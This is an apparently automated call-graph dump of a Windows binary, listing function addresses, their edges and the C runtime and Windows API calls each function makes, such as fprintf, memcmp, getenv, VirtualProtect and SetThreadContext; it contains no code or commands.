30744 70a1dc4c _errno 30750 70a1dc75 fprintf fprintf fputc fclose 30744->30750 30751 70a1dc5a _errno strerror fprintf 30744->30751 30745->30052 30746->30763 30747->30746 30748 70a1e00f fprintf 30755 70a1e028 fputc 30748->30755 30749->30052 30750->30763 30751->30750 30752 70a1de24 fprintf 30752->30763 30753 70a1defd fprintf 30758 70a1df16 fputc 30753->30758 30754 70a1dd12 fprintf 30754->30763 30755->30052 30756 70a1db3a _errno 30759 70a1db63 fprintf fprintf fputc fclose 30756->30759 30760 70a1db48 _errno strerror fprintf 30756->30760 30757 70a1ddeb fprintf 30764 70a1de04 fputc 30757->30764 30758->30052 30759->30763 30760->30759 30761 70a1dc00 fprintf 30761->30763 30762 70a1dcd9 fprintf 30765 70a1dcf2 fputc 30762->30765 30763->30052 30763->30054 30763->30058 30763->30060 30763->30068 30763->30071 30763->30073 30763->30098 30763->30099 30763->30102 30763->30103 30763->30109 30763->30110 30763->30116 30763->30117 30763->30122 30763->30125 30763->30127 30763->30128 30763->30132 30763->30136 30763->30137 30763->30142 30763->30144 30763->30154 30763->30155 30763->30157 30763->30158 30763->30159 30763->30161 30763->30165 30763->30166 30763->30171 30763->30175 30763->30177 30763->30178 30763->30182 30763->30188 30763->30189 30763->30190 30763->30196 30763->30197 30763->30201 30763->30202 30763->30204 30763->30205 30763->30206 30763->30208 30763->30210 30763->30213 30763->30221 30763->30225 30763->30227 30763->30228 30763->30229 30763->30230 30763->30231 30763->30232 30763->30233 30763->30235 30763->30240 30763->30241 30763->30247 30763->30257 30763->30260 30763->30262 30763->30265 30763->30266 30763->30267 30763->30270 30763->30271 30763->30278 30763->30282 30763->30287 30763->30288 30763->30298 30763->30305 30763->30306 30763->30309 30763->30314 30763->30316 30763->30321 30763->30322 30763->30323 30763->30332 30763->30333 30763->30338 30763->30341 30763->30343 30763->30348 30763->30349 30763->30354 30763->30358 30763->30360 30763->30361 30763->30362 30763->30364 30763->30369 30763->30375 30763->30376 30763->30377 30763->30378 30763->30379 30763->30383 30763->30386 30763->30387 30763->30391 30763->30392 30763->30394 30763->30395 30763->30399 30763->30400 30763->30405 30763->30406 30763->30410 30763->30413 30763->30414 30763->30415 30763->30416 30763->30417 30763->30422 30763->30423 30763->30428 30763->30429 30763->30430 30763->30434 30763->30439 30763->30441 30763->30442 30763->30444 30763->30445 30763->30446 30763->30450 30763->30451 30763->30456 30763->30457 30763->30458 30763->30462 30763->30467 30763->30468 30763->30470 30763->30472 30763->30473 30763->30474 30763->30478 30763->30479 30763->30484 30763->30485 30763->30486 30763->30490 30763->30495 30763->30496 30763->30497 30763->30500 30763->30501 30763->30502 30763->30506 30763->30507 30763->30512 30763->30513 30763->30514 30763->30518 30763->30523 30763->30524 30763->30525 30763->30528 30763->30529 30763->30530 30763->30534 30763->30535 30763->30539 30763->30542 30763->30543 30763->30547 30763->30552 30763->30553 30763->30554 30763->30557 30763->30558 30763->30559 30763->30563 30763->30564 30763->30568 30763->30570 30763->30571 30763->30575 30763->30580 30763->30581 30763->30582 30763->30585 30763->30586 30763->30589 30763->30593 30763->30594 30763->30596 30763->30598 30763->30599 30763->30601 30763->30604 30763->30607 30763->30608 30763->30613 30763->30614 30763->30617 30763->30622 30763->30623 30763->30624 30763->30627 30763->30628 30763->30629 30763->30633 30763->30635 30763->30636 30763->30639 30763->30641 30763->30645 30763->30650 30763->30651 30763->30652 30763->30655 30763->30656 30763->30657 30763->30661 30763->30664 30763->30665 30763->30668 30763->30669 30763->30675 30763->30681 30763->30682 30763->30683 30763->30687 30763->30688 30763->30689 30763->30693 30763->30696 30763->30699 30763->30702 30763->30704 30763->30705 30763->30712 30763->30719 30763->30720 30763->30721 30763->30724 30763->30725 30763->30728 30763->30730 30763->30731 30763->30735 30763->30739 30763->30740 30763->30741 30763->30743 30763->30744 30763->30748 30763->30752 30763->30753 30763->30754 30763->30756 30763->30757 30763->30761 30763->30762 30766 70a1dbc7 fprintf 30763->30766 30767 70a1ae72 _errno 30763->30767 30771 70a1ae8e fprintf fprintf fputc fclose 30763->30771 30773 70a1b066 _errno 30763->30773 30777 70a1aab4 _errno 30763->30777 30780 70a1ac59 _errno 30763->30780 30782 70a1b2a6 _errno 30763->30782 30788 70a1bec5 _errno 30763->30788 30764->30052 30765->30052 30770 70a1dbe0 fputc 30766->30770 30767->30763 30768 70a1c271 _errno strerror fprintf 30767->30768 30768->30763 30798 70a2cd70 30769->30798 30770->30052 30771->30763 30773->30763 30774 70a1b06e _errno strerror fprintf 30773->30774 30774->30763 30775->30125 30777->30763 30779 70a1bee3 _errno strerror fprintf 30777->30779 30779->30763 30780->30160 30780->30763 30781->30125 30782->30763 30784 70a1c5bb _errno strerror fprintf 30782->30784 30784->30130 30787->30125 30788->30284 30788->30763 30789->30125 30789->30763 30790->30125 30790->30763 30791->30051 30793 70a1abe9 30791->30793 30792->30125 30793->30151 30796 70a1ac08 _errno 30793->30796 30993 70a04200 7 API calls 30793->30993 30795->30125 30796->30062 30797 70a1bde1 _errno strerror fprintf 30796->30797 30797->30149 30799 70a2cf35 30798->30799 30802 70a2cd82 30798->30802 30997 70a2c910 __iob_func 30799->30997 30802->30125 30804 70a2d40f 30803->30804 30816 70a2d1f8 30803->30816 30805 70a2c910 2 API calls 30804->30805 30809 70a2d428 30805->30809 30806 70a2d207 memcmp 30807 70a2d220 memcmp 30806->30807 30808 70a2d312 30806->30808 30807->30808 30810 70a2d23f memcmp 30807->30810 30808->30125 30810->30808 30811 70a2d25f memcmp 30810->30811 30811->30808 30812 70a2d27f memcmp 30811->30812 30812->30808 30813 70a2d29f memcmp 30812->30813 30813->30808 30814 70a2d2bf memcmp 30813->30814 30814->30808 30815 70a2d2df memcmp 30814->30815 30815->30808 30815->30816 30816->30806 30816->30808 30818 70a2d1b7 30817->30818 30819 70a2cf68 30817->30819 30820 70a2c910 2 API calls 30818->30820 30821 70a2cf77 memcmp 30819->30821 30824 70a2d085 30819->30824 30822 70a2d1d0 30820->30822 30823 70a2cf90 memcmp 30821->30823 30821->30824 30823->30824 30825 70a2cfb2 memcmp 30823->30825 30824->30125 30825->30824 30826 70a2cfd2 memcmp 30825->30826 30826->30824 30827 70a2cff2 memcmp 30826->30827 30827->30824 30828 70a2d012 memcmp 30827->30828 30828->30824 30829 70a2d032 memcmp 30828->30829 30829->30824 30830 70a2d052 memcmp 30829->30830 30830->30819 30830->30824 30832 70a2cc01 30831->30832 30838 70a2cae6 30831->30838 30833 70a2c910 2 API calls 30832->30833 30834 70a2cc1a 30833->30834 30835 70a2caf8 strcmp 30837 70a2cbef 30835->30837 30835->30838 30836 70a2cb22 strcmp 30836->30837 30836->30838 30837->30125 30838->30835 30838->30836 30838->30837 30839 70a2cb41 strcmp 30838->30839 30840 70a2cb60 strcmp 30838->30840 30841 70a2cb7f strcmp 30838->30841 30842 70a2cb9a strcmp 30838->30842 30843 70a2cbb5 strcmp 30838->30843 30844 70a2cbd0 strcmp 30838->30844 30839->30837 30839->30838 30840->30837 30840->30838 30841->30837 30841->30838 30842->30837 30842->30838 30843->30837 30843->30838 30844->30837 30844->30838 30846 70a2cd48 30845->30846 30853 70a2cc36 30845->30853 30847 70a2c910 2 API calls 30846->30847 30848 70a2cd61 30847->30848 30849 70a2cc48 strcmp 30849->30853 30858 70a2cd36 30849->30858 30850 70a2cc6c strcmp 30850->30853 30850->30858 30851 70a2cc88 strcmp 30851->30853 30851->30858 30852 70a2cca7 strcmp 30852->30853 30852->30858 30853->30849 30853->30850 30853->30851 30853->30852 30854 70a2ccc6 strcmp 30853->30854 30855 70a2cce1 strcmp 30853->30855 30856 70a2ccfc strcmp 30853->30856 30857 70a2cd17 strcmp 30853->30857 30853->30858 30854->30853 30854->30858 30855->30853 30855->30858 30856->30853 30856->30858 30857->30853 30857->30858 30858->30125 30860 70a700fe 30859->30860 31000 70a702c9 30860->31000 30862 70a70133 exit 30863 70a7014e 30862->30863 30863->30125 30864 70a70103 30864->30862 31003 70a702f0 GetCurrentThread GetThreadContext 30864->31003 30866 70a70115 30866->30862 30867 70a70119 30866->30867 30867->30125 31010 70a6f4c0 30868->31010 30870 70a049f5 free 30883 70a05f90 30870->30883 30871 70a049e5 30871->30870 30872 70a04a33 30871->30872 31041 70a04200 7 API calls 30872->31041 30874 70a04a46 30875 70a04af0 fprintf 30874->30875 30876 70a04a52 _errno 30874->30876 30880 70a04ab8 fprintf 30875->30880 30877 70a04b24 _errno strerror fprintf 30876->30877 30878 70a04a66 fprintf fprintf fputc fclose 30876->30878 30877->30878 30878->30880 30882 70a04adb fputc 30880->30882 30882->30870 30884 70a05fb2 30883->30884 30896 70a0605d 30883->30896 30886 70a060d0 malloc 30884->30886 30887 70a05fd0 30884->30887 30885 70a024c0 strlen strlen malloc _strdup 30885->30896 30890 70a060ea memcpy 30886->30890 30888 70a06171 malloc 30887->30888 30889 70a05fee 30887->30889 30888->30890 30891 70a060ba 30889->30891 30893 70a06110 malloc 30889->30893 30894 70a0601f getenv 30889->30894 30890->30125 30891->30125 30893->30890 30919 70a06034 30894->30919 30896->30885 30897 70a060a8 free 30896->30897 30898 70a064a1 _errno 30896->30898 30899 70a0613c free 30896->30899 30900 70a062dc _errno 30896->30900 30904 70a06300 free 30896->30904 30905 70a061b1 free 30896->30905 30908 70a065d7 fprintf 30896->30908 30910 70a06545 getenv 30896->30910 30911 70a0631d strlen strlen malloc 30896->30911 30913 70a0650f fprintf 30896->30913 30915 70a0640e 30896->30915 30896->30919 31165 70a048d0 15 API calls 30896->31165 31167 70a05f20 6 API calls 30896->31167 31168 70a048d0 15 API calls 30896->31168 31170 70a04200 7 API calls 30896->31170 30897->30891 30901 70a06673 _errno strerror fprintf 30898->30901 30902 70a064af fprintf fprintf fputc fclose 30898->30902 30903 70a06144 30899->30903 30900->30919 30901->30919 30902->30896 30907 70a06155 30903->30907 30921 70a061b8 30903->30921 30904->30896 30905->30903 30906 70a063e0 _access 30906->30896 30906->30919 30916 70a06164 _errno 30907->30916 30917 70a0660e _errno strerror 30907->30917 30908->30896 30910->30919 30911->30896 30914 70a06586 30911->30914 30912 70a067be 31172 70a04200 7 API calls 30912->31172 30923 70a06524 fputc 30913->30923 30928 70a066d9 30914->30928 30933 70a0659b 30914->30933 31169 70a048d0 15 API calls 30915->31169 30916->30891 30917->30933 30919->30896 30919->30900 30919->30906 30919->30910 30919->30911 30919->30912 30925 70a0656e getenv 30919->30925 30920 70a061d7 _errno 30926 70a061fa 8 API calls 30920->30926 30927 70a061df _errno strerror fprintf 30920->30927 30921->30920 30934 70a0664a fprintf 30921->30934 31166 70a04200 7 API calls 30921->31166 30923->30919 30924 70a067d1 30931 70a0685c 30924->30931 30932 70a067dd _errno 30924->30932 30925->30911 30925->30914 30935 70a06272 fprintf 30926->30935 30927->30926 31171 70a04200 7 API calls 30928->31171 30930 70a06419 free 30930->30891 30937 70a0642d 30930->30937 30941 70a068a3 fprintf 30931->30941 30950 70a0686a fprintf 30931->30950 30939 70a06806 fprintf fprintf fputc fclose 30932->30939 30940 70a067eb _errno strerror fprintf 30932->30940 30933->30916 30934->30901 30946 70a0628a fputc 30935->30946 30944 70a068f0 30937->30944 30945 70a0643a 30937->30945 30938 70a066ec 30942 70a066f8 _errno 30938->30942 30943 70a06755 30938->30943 30939->30931 30940->30939 30941->30931 30948 70a068d0 _errno strerror fprintf 30942->30948 30949 70a06703 fprintf fprintf fputc fclose 30942->30949 30953 70a06798 fprintf 30943->30953 30962 70a06763 fprintf 30943->30962 31173 70a04200 7 API calls 30944->31173 30945->30916 30954 70a06450 _errno strerror 30945->30954 30946->30896 30948->30944 30949->30943 30958 70a06883 fputc 30950->30958 30952 70a06903 30956 70a069cb fprintf 30952->30956 30957 70a0690f _errno 30952->30957 30953->30943 30964 70a0647d 30954->30964 30955 70a063b8 free 30955->30903 30959 70a063cc 30955->30959 30965 70a06983 _errno strerror 30956->30965 30960 70a06921 6 API calls 30957->30960 30961 70a06a09 _errno strerror fprintf 30957->30961 30958->30931 30959->30891 30960->30965 30966 70a06778 fputc 30962->30966 30964->30916 30967 70a0699d fprintf 30965->30967 30966->30943 30968 70a069b9 fputc 30967->30968 30968->30956 30970 70a05f90 107 API calls 30969->30970 30971 70a0d56a 30970->30971 30972 70a0d5c0 30971->30972 30973 70a0d572 30971->30973 30974 70a0d5e0 30972->30974 30975 70a0d5d1 _errno 30972->30975 31174 70a0a580 30973->31174 31546 70a04200 7 API calls 30974->31546 30977 70a0d5b4 30975->30977 30977->30125 30980 70a0d5f3 30981 70a0d68c fprintf 30980->30981 30982 70a0d5ff _errno 30980->30982 30985 70a0d65a fprintf 30981->30985 30983 70a0d6c0 _errno strerror fprintf 30982->30983 30984 70a0d60b fprintf fprintf fputc fclose 30982->30984 30983->30984 30984->30985 30988 70a0d67a fputc 30985->30988 30988->30975 30989->30105 30990->30059 30991->30126 30992->30162 30993->30793 30994->30763 30995->30125 30996->30283 30998 70a961b0 30997->30998 30999 70a2c941 abort 30998->30999 31006 70a701a0 31000->31006 31005 70a7032e GetCurrentThread SetThreadContext 31003->31005 31005->30866 31007 70a701b4 31006->31007 31008 70a70202 31007->31008 31009 70a701e7 RtlWow64SetThreadContext 31007->31009 31008->30864 31009->31008 31042 70a70450 31010->31042 31012 70a6f512 malloc 31013 70a6f533 memcpy 31012->31013 31015 70a700c8 31012->31015 31019 70a6f555 31013->31019 31034 70a6f5ee 31013->31034 31014 70a6f5f3 free 31014->30871 31016 70a700a0 31136 70a758a0 malloc 31016->31136 31017 70a76b70 malloc abort 31017->31019 31019->31014 31019->31015 31019->31016 31019->31017 31022 70a7b420 malloc fwrite abort 31019->31022 31027 70a758a0 malloc 31019->31027 31028 70a75630 malloc 31019->31028 31019->31034 31035 70a75a20 malloc 31019->31035 31036 70a76f70 malloc 31019->31036 31040 70a77570 malloc 31019->31040 31043 70a75080 31019->31043 31064 70a76840 31019->31064 31072 70a93630 31019->31072 31100 70a75200 31019->31100 31123 70a76390 31019->31123 31127 70a7a5d0 malloc 31019->31127 31128 70a7b8f0 malloc fwrite abort 31019->31128 31129 70a769a0 malloc 31019->31129 31130 70a753d0 free UnmapViewOfFile GetLastError _errno 31019->31130 31131 70a76390 malloc abort 31019->31131 31132 70a76ad0 malloc abort 31019->31132 31133 70a75c00 malloc 31019->31133 31134 70a75ce0 malloc 31019->31134 31135 70a755f0 malloc 31019->31135 31022->31019 31027->31019 31028->31019 31034->31014 31035->31019 31036->31019 31040->31019 31041->30874 31042->31012 31137 70a70470 malloc 31043->31137 31045 70a75093 31046 70a70470 malloc 31045->31046 31047 70a750a6 31046->31047 31048 70a70470 malloc 31047->31048 31049 70a750e5 31048->31049 31050 70a70470 malloc 31049->31050 31051 70a75103 31050->31051 31052 70a70470 malloc 31051->31052 31053 70a75120 31052->31053 31054 70a70470 malloc 31053->31054 31055 70a75141 31054->31055 31056 70a70470 malloc 31055->31056 31057 70a75166 31056->31057 31058 70a70470 malloc 31057->31058 31059 70a7518b 31058->31059 31060 70a70470 malloc 31059->31060 31061 70a751b0 31060->31061 31062 70a70470 malloc 31061->31062 31063 70a751d5 31062->31063 31063->31019 31065 70a7685a 31064->31065 31138 70a70470 malloc 31065->31138 31067 70a76920 31068 70a72e20 malloc 31067->31068 31069 70a76938 31068->31069 31070 70a72e20 malloc 31069->31070 31071 70a76973 31070->31071 31071->31019 31073 70a9364c 31072->31073 31093 70a93809 31072->31093 31075 70a937f0 31073->31075 31076 70a937c9 31073->31076 31077 70a9366a 31073->31077 31079 70a943e0 9 API calls 31075->31079 31075->31093 31143 70a943e0 31076->31143 31156 70a82250 6 API calls 31077->31156 31079->31093 31082 70a938c9 memset 31082->31093 31083 70a704f0 free 31083->31093 31084 70a93755 31086 70a93767 31084->31086 31084->31093 31085 70a9376d 31139 70a95a60 31085->31139 31086->31085 31089 70a93793 31086->31089 31088 70a93695 31088->31084 31091 70a9378a 31088->31091 31098 70a936e8 31088->31098 31159 70a704f0 31089->31159 31090 70a93780 31090->31091 31094 70a95a60 VirtualProtect 31090->31094 31091->31019 31093->31082 31093->31083 31093->31085 31162 70a7a190 12 API calls 31093->31162 31163 70a93ed0 memcpy malloc free 31093->31163 31096 70a937bc 31094->31096 31096->31019 31097 70a943e0 9 API calls 31097->31098 31098->31084 31098->31088 31098->31097 31157 70a945b0 UnmapViewOfFile GetLastError _errno 31098->31157 31158 70a82250 6 API calls 31098->31158 31101 70a704f0 free 31100->31101 31102 70a7522e 31101->31102 31103 70a704f0 free 31102->31103 31104 70a7523b 31103->31104 31105 70a704f0 free 31104->31105 31106 70a75258 31105->31106 31107 70a704f0 free 31106->31107 31108 70a75268 31107->31108 31109 70a704f0 free 31108->31109 31110 70a75278 31109->31110 31111 70a704f0 free 31110->31111 31112 70a75288 31111->31112 31113 70a704f0 free 31112->31113 31114 70a75298 31113->31114 31115 70a752ef 31114->31115 31117 70a704f0 free 31114->31117 31116 70a704f0 free 31115->31116 31118 70a752fb 31116->31118 31117->31114 31119 70a75351 31118->31119 31122 70a704f0 free 31118->31122 31120 70a704f0 free 31119->31120 31121 70a7535d 31120->31121 31122->31118 31124 70a763ad 31123->31124 31126 70a763b5 31123->31126 31124->31126 31164 70a75d50 abort 31124->31164 31126->31019 31127->31019 31128->31019 31129->31019 31130->31019 31131->31019 31132->31019 31133->31019 31134->31019 31135->31019 31136->31015 31142 70a95a6a 31139->31142 31140 70a95a96 VirtualProtect 31141 70a95aae 31140->31141 31141->31090 31142->31140 31142->31141 31149 70a943fa 31143->31149 31144 70a94437 _errno 31145 70a9444f 31144->31145 31146 70a94500 _errno 31144->31146 31145->31146 31150 70a94462 31145->31150 31147 70a9450f 31146->31147 31147->31075 31148 70a94598 31149->31144 31149->31148 31151 70a94473 CreateFileMappingA 31150->31151 31152 70a94564 _get_osfhandle 31150->31152 31153 70a944d8 GetLastError _errno 31151->31153 31154 70a944a3 MapViewOfFile CloseHandle 31151->31154 31152->31151 31155 70a9457e _errno 31152->31155 31153->31075 31154->31147 31154->31153 31155->31147 31156->31088 31157->31098 31158->31098 31160 70a70500 free 31159->31160 31161 70a7050d 31159->31161 31160->31161 31161->31090 31162->31093 31163->31093 31164->31126 31165->30896 31166->30921 31167->30896 31168->30955 31169->30930 31170->30896 31171->30938 31172->30924 31173->30952 31175 70a0a596 31174->31175 31176 70a05f90 107 API calls 31175->31176 31177 70a0a5c7 31176->31177 31178 70a0a5d3 31177->31178 31179 70a0b004 31177->31179 31547 70a2b250 31178->31547 31181 70a0aa70 _errno 31179->31181 31182 70a0b019 31179->31182 31185 70a0aa7a free 31181->31185 31712 70a04200 7 API calls 31182->31712 31183 70a0a5f0 31186 70a0bad3 free 31183->31186 31188 70a0aa12 31183->31188 31192 70a0a1f0 55 API calls 31183->31192 31185->30977 31191 70a0c1b0 31186->31191 31273 70a0aa57 31186->31273 31187 70a0b02c 31189 70a0c290 fprintf 31187->31189 31190 70a0b038 _errno 31187->31190 31197 70a0aa30 free free 31188->31197 31208 70a0ad91 31189->31208 31194 70a0b044 fprintf fputc fclose 31190->31194 31195 70a0c926 _errno strerror fprintf 31190->31195 31732 70a04200 7 API calls 31191->31732 31196 70a0a651 31192->31196 31204 70a0b08b fputc 31194->31204 31202 70a0c946 fprintf 31195->31202 31200 70a0ab25 free 31196->31200 31201 70a0a65d 31196->31201 31375 70a0a843 31197->31375 31198 70a0c1c3 31203 70a0c1cf _errno 31198->31203 31486 70a0b620 31198->31486 31200->31375 31577 70a2f890 31201->31577 31214 70a0b241 fprintf 31202->31214 31206 70a0c1f2 fprintf 31203->31206 31207 70a0c1d7 _errno strerror fprintf 31203->31207 31204->31181 31733 70a2d430 31206->31733 31207->31206 31355 70a0ada1 31208->31355 31734 70a22980 24 API calls 31208->31734 31209 70a0a678 31209->31197 31620 70a304d0 31209->31620 31211 70a0c79f fprintf 31211->31486 31233 70a0b261 fputc 31214->31233 31215 70a0c21d fprintf fputc fclose 31219 70a0c252 31215->31219 31216 70a0c2f8 31220 70a0c300 31216->31220 31216->31355 31217 70a0b51f _errno 31222 70a0b544 fprintf 31217->31222 31223 70a0b529 _errno strerror fprintf 31217->31223 31231 70a0c263 fprintf 31219->31231 31225 70a0c317 31220->31225 31220->31273 31718 70a2d430 31222->31718 31223->31222 31735 70a04200 7 API calls 31225->31735 31227 70a0c3d0 fprintf 31241 70a0c400 memcpy 31227->31241 31229 70a0c7d6 fprintf 31229->31486 31242 70a0c278 fputc 31231->31242 31232 70a0c32a 31237 70a0d023 fprintf 31232->31237 31238 70a0c336 _errno 31232->31238 31233->31273 31234 70a0be00 31239 70a0be17 31234->31239 31234->31273 31235 70a0b56f fprintf fputc fclose 31240 70a0b5a4 31235->31240 31236 70a0a6f3 31236->31197 31253 70a0a6fb 31236->31253 31263 70a0d05a free 31237->31263 31243 70a0c341 fprintf fprintf fputc fclose 31238->31243 31244 70a0d445 _errno strerror fprintf 31238->31244 31728 70a04200 7 API calls 31239->31728 31254 70a0b5b5 fprintf 31240->31254 31241->31375 31242->31189 31255 70a0c39e fprintf 31243->31255 31256 70a0d465 fprintf 31244->31256 31246 70a0a70a free free 31247 70a0a729 31246->31247 31246->31375 31250 70a0a732 strncmp 31247->31250 31286 70a0aaa0 31247->31286 31249 70a0be2a 31257 70a0cc50 fprintf 31249->31257 31258 70a0be36 _errno 31249->31258 31259 70a0a75a strncmp 31250->31259 31290 70a0ac53 31250->31290 31251 70a0cd18 fprintf 31291 70a0cd4f _errno strerror fprintf 31251->31291 31252 70a0c81e _errno 31260 70a0cf21 _errno strerror fprintf 31252->31260 31261 70a0c82c fprintf fprintf fputc fclose 31252->31261 31253->31246 31262 70a049d0 51 API calls 31253->31262 31271 70a0b5ca fputc 31254->31271 31274 70a0c3b0 fputc 31255->31274 31292 70a0d49c fprintf 31256->31292 31257->31214 31265 70a0be40 _errno strerror fprintf 31258->31265 31266 70a0a9ff fprintf fprintf fputc fclose 31258->31266 31267 70a0ab40 atof _time64 31259->31267 31268 70a0a777 31259->31268 31260->31486 31279 70a0c889 fprintf 31261->31279 31270 70a0ac27 31262->31270 31263->31273 31464 70a0a90e 31263->31464 31264 70a0bb87 31264->31273 31724 70a04200 7 API calls 31264->31724 31265->31266 31266->31214 31284 70a0b273 31267->31284 31285 70a0ab98 31267->31285 31278 70a0a783 strncmp 31268->31278 31307 70a0aab4 31268->31307 31270->31246 31271->31307 31273->31181 31274->31273 31276 70a0b47d strncmp 31276->31264 31276->31375 31287 70a0a7a6 31278->31287 31298 70a0a7c7 31278->31298 31299 70a0c89b fputc 31279->31299 31282 70a0aea1 31282->31273 31283 70a0aeb8 31282->31283 31711 70a04200 7 API calls 31283->31711 31308 70a0b7d0 31284->31308 31309 70a0b281 31284->31309 31294 70a0b3f5 31285->31294 31295 70a0abab 31285->31295 31286->31307 31713 70a22980 24 API calls 31286->31713 31297 70a0bab2 _time64 31287->31297 31287->31298 31288 70a0a84c strncmp 31288->31286 31301 70a0a872 strncmp 31288->31301 31289 70a0bbc8 31305 70a0bbd4 _errno 31289->31305 31306 70a0c8ad fprintf 31289->31306 31304 70a0af89 31290->31304 31290->31307 31332 70a0af2a sprintf 31290->31332 31314 70a0cd6f fprintf 31291->31314 31292->31214 31717 70a22980 24 API calls 31294->31717 31295->31273 31318 70a0b8c0 31295->31318 31297->31186 31302 70a0a802 strncmp 31298->31302 31303 70a0ac4a 31298->31303 31298->31307 31299->31306 31300 70a0d37b _errno 31311 70a0d519 _errno strerror fprintf 31300->31311 31312 70a0d38d fprintf fprintf fputc fclose 31300->31312 31321 70a0b2c2 31301->31321 31322 70a0a892 strncmp 31301->31322 31319 70a0acd0 31302->31319 31320 70a0a823 strncmp 31302->31320 31303->31320 31304->31273 31304->31286 31334 70a0c100 31304->31334 31323 70a0bbf7 31305->31323 31324 70a0bbdc _errno strerror fprintf 31305->31324 31306->31307 31307->31185 31307->31273 31313 70a0aaf6 _errno 31307->31313 31315 70a0d0a7 fprintf 31307->31315 31450 70a0cfbf 31307->31450 31307->31486 31719 70a04200 7 API calls 31308->31719 31309->31181 31344 70a0b297 _errno strerror 31309->31344 31310 70a0cf48 _errno strerror fprintf 31310->31486 31311->31375 31340 70a0d3ea fprintf 31312->31340 31313->31185 31379 70a0cda6 fprintf 31314->31379 31331 70a0d0e8 fprintf 31315->31331 31317 70a0aecb 31330 70a0aed7 _errno 31317->31330 31317->31331 31720 70a04200 7 API calls 31318->31720 31319->31294 31336 70a0acee 31319->31336 31320->31375 31529 70a0ad70 31320->31529 31715 70a22980 24 API calls 31321->31715 31333 70a0a8af strncmp 31322->31333 31322->31375 31323->31273 31366 70a0bc25 31323->31366 31324->31323 31328 70a0d4e1 fprintf 31328->31464 31330->31266 31345 70a0aede _errno strerror fprintf 31330->31345 31331->31214 31346 70a0af55 31332->31346 31333->31307 31347 70a0a8cc strchr 31333->31347 31731 70a04200 7 API calls 31334->31731 31335 70a0b7e3 31349 70a0b7ef _errno 31335->31349 31335->31486 31350 70a0bd15 31336->31350 31370 70a0ad07 31336->31370 31337 70a0b8d3 31352 70a0b8df _errno 31337->31352 31337->31486 31378 70a0d3fc fputc 31340->31378 31341 70a0cbe2 fprintf 31407 70a0cc19 fprintf 31341->31407 31342 70a0c59c _errno 31358 70a0c5a4 _errno strerror fprintf 31342->31358 31359 70a0c5bf fprintf fprintf fputc fclose 31342->31359 31344->31273 31345->31266 31386 70a0af63 strcmp 31346->31386 31387 70a0cc87 strstr 31346->31387 31347->31307 31364 70a0a8e7 31347->31364 31367 70a0b800 _errno strerror fprintf 31349->31367 31368 70a0b81b 8 API calls 31349->31368 31350->31273 31374 70a0bd2c 31350->31374 31351 70a0cf76 fprintf 31351->31307 31371 70a0b904 fprintf fprintf fputc fclose 31352->31371 31372 70a0b8e9 _errno strerror fprintf 31352->31372 31353 70a0bb30 31353->31273 31723 70a04200 7 API calls 31353->31723 31354 70a0b0fa 31354->31307 31354->31353 31373 70a0b15c strncmp 31354->31373 31355->31234 31355->31307 31355->31375 31356 70a0c113 31376 70a0c11f _errno 31356->31376 31356->31486 31358->31359 31403 70a0c61c fprintf 31359->31403 31360 70a0b63f _errno 31380 70a0ca92 _errno strerror fprintf 31360->31380 31381 70a0b64b fprintf fprintf fputc fclose 31360->31381 31362 70a0b6ef _errno 31383 70a0cab2 _errno strerror fprintf 31362->31383 31384 70a0b6fd fprintf fprintf fputc fclose 31362->31384 31363 70a0d13e _errno 31385 70a0d145 _errno strerror fprintf 31363->31385 31363->31464 31388 70a0a8f4 strchr 31364->31388 31389 70a0ca09 strchr 31364->31389 31365 70a0b419 31365->31273 31365->31375 31729 70a04200 7 API calls 31365->31729 31725 70a04200 7 API calls 31366->31725 31367->31368 31406 70a0b890 fprintf 31368->31406 31710 70a22810 60 API calls 31370->31710 31409 70a0b961 fprintf 31371->31409 31372->31371 31373->31353 31391 70a0b174 31373->31391 31727 70a04200 7 API calls 31374->31727 31375->31264 31375->31273 31375->31276 31375->31282 31375->31288 31375->31307 31375->31375 31412 70a0bc80 31375->31412 31422 70a0c059 31375->31422 31428 70a0ba10 strncmp 31375->31428 31375->31464 31489 70a0ba49 31375->31489 31721 70a22980 24 API calls 31375->31721 31376->31291 31392 70a0c12b fprintf fprintf fputc fclose 31376->31392 31377 70a0c506 fprintf 31377->31486 31413 70a0d40e fprintf 31378->31413 31439 70a0bda6 fprintf 31379->31439 31380->31383 31415 70a0b6a8 fprintf 31381->31415 31405 70a0cad2 31383->31405 31421 70a0b761 fprintf 31384->31421 31385->31464 31386->31304 31386->31307 31387->31386 31401 70a0cca4 strstr 31387->31401 31388->31405 31388->31464 31418 70a0ca63 atof 31389->31418 31419 70a0ca45 atof 31389->31419 31391->31307 31427 70a0b198 31391->31427 31429 70a0c188 fprintf 31392->31429 31394 70a0b2ec 31394->31307 31394->31323 31416 70a0b34e strncmp 31394->31416 31396 70a0bc38 31396->31202 31426 70a0bc44 _errno 31396->31426 31397 70a0c42e fprintf 31397->31486 31399 70a0c465 fprintf 31399->31307 31401->31386 31411 70a0ccc1 strstr 31401->31411 31402 70a0c554 fprintf 31402->31486 31440 70a0c62e fputc 31403->31440 31404 70a04200 7 API calls 31404->31486 31405->31273 31423 70a0cae9 31405->31423 31446 70a0b8a5 fputc 31406->31446 31407->31257 31408 70a0ad27 31408->31241 31437 70a0ad2f 31408->31437 31451 70a0b973 fputc 31409->31451 31410 70a0bd3f 31410->31407 31438 70a0bd4b _errno 31410->31438 31411->31386 31412->31273 31436 70a0bc95 31412->31436 31413->31244 31456 70a0b6ba fputc 31415->31456 31416->31323 31430 70a0b366 31416->31430 31418->31307 31432 70a0ca78 31418->31432 31419->31307 31419->31389 31420 70a0bb58 31431 70a0bb64 _errno 31420->31431 31420->31486 31460 70a0b77a fputc 31421->31460 31422->31273 31730 70a04200 7 API calls 31422->31730 31737 70a04200 7 API calls 31423->31737 31425 70a0c768 fprintf 31425->31486 31426->31266 31435 70a0bc4e _errno strerror fprintf 31426->31435 31427->31273 31452 70a0b1ad 31427->31452 31428->31375 31428->31412 31469 70a0c19a fputc 31429->31469 31430->31307 31471 70a0b38a 31430->31471 31431->31264 31459 70a0bb6c _errno strerror fprintf 31431->31459 31432->31273 31432->31450 31433 70a04200 7 API calls 31433->31464 31435->31266 31726 70a04200 7 API calls 31436->31726 31437->31273 31449 70a0c97d 31437->31449 31453 70a0bd57 fprintf fprintf fputc fclose 31438->31453 31454 70a0ceca _errno strerror fprintf 31438->31454 31509 70a0bdc6 fputc 31439->31509 31440->31486 31441 70a0beda 31441->31314 31457 70a0bee6 _errno 31441->31457 31442 70a0ce3e _errno 31458 70a0ce45 _errno strerror fprintf 31442->31458 31442->31486 31443 70a0cce1 fprintf 31443->31251 31444 70a0c6b6 _errno 